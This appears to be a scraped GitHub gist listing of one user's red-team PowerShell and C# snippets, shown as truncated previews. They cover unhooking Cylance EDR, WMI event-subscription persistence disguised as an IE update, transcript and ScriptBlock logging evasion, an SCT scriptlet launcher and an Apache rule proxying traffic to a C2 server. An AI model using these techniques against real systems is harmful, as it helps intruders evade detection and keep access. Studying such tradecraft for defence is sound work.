Skip to content

Instantly share code, notes, and snippets.

Ben Turner benpturner

Block or report user

Report or block benpturner

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:1f31de5331842c25f4eed585d4bd2d65
function Unhook-Cylance() {
$winapi = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
View WMIEvent
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
Backdoor-wp.pdf
@benpturner
benpturner / whoami.txt
Last active Sep 16, 2018
Whoami /groups
View whoami.txt
([Security.Principal.WindowsIdentity]::GetCurrent());
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl
@benpturner
benpturner / posh.cs
Last active Jan 4, 2019
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
View posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
@benpturner
benpturner / posh.cs
Created Jul 18, 2018
No Powershell with Transcript Logging Evasion
View posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
@benpturner
benpturner / perms.ps1
Last active Oct 18, 2018
Powershell Perm Review
View perms.ps1
Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation
@benpturner
benpturner / sct
Last active Mar 28, 2019
Simple CSript - Implied JScript
View sct
<cOmPoNeNt><sCRipT>
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0");
</sCRipT></cOmPoNeNt>
@benpturner
benpturner / Whitelist
Last active Aug 1, 2017
Apache Rewrite Whitelist
View Whitelist
# whitelist need to be formatted like so
# 104.44.44.44 -
# 104.33.33.33 -
RewriteMap ips txt:/opt/whitelist.txt
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC]
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P]
View Simple HTTP Server
$serverport = '$port'
$httpresponse = '
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
@benpturner
benpturner / posh.cs
Last active Jul 18, 2018
Powershell.exe no more
View posh.cs
using System;
using System.Text;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.EnterpriseServices;
You can’t perform that action at this time.